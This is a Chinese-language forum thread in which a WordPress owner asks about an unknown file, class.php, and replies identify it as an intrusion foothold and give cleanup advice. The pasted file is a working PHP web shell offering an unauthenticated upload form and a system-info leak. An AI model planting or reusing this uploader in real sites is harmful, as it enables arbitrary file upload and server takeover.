0
一个名为class.php的文件出现在我的wordpress文件夹和wp-includes/pomo文件夹中。这个文件是什么? Class.php in wordpress
这是什么文件?我最近3天没有编辑我的身边。
代码
<?php
echo '<b>Jundab<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if($_POST['_upl'] == "Upload") {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>
请帮助。
看起来有人正在准备入侵。他们已经成功地创建了一个“端点”来上传恶意脚本。你应该尽快更新你的WordPress和所有插件,检查权限,删除不必要的插件,并重置所有用户密码。当然,立即删除该脚本。可能需要额外的措施来确保您已正确清理所有内容。 – lxg 2014-10-04 19:34:04
我同意,这正是它的样子。 – 2014-10-04 19:43:36
谢谢。我删除它。 但是,如何获得访问我的服务器?我已完全锁定它,并将我的文件夹权限设置为705. 谢谢! – Ethan17 2014-10-04 20:39:35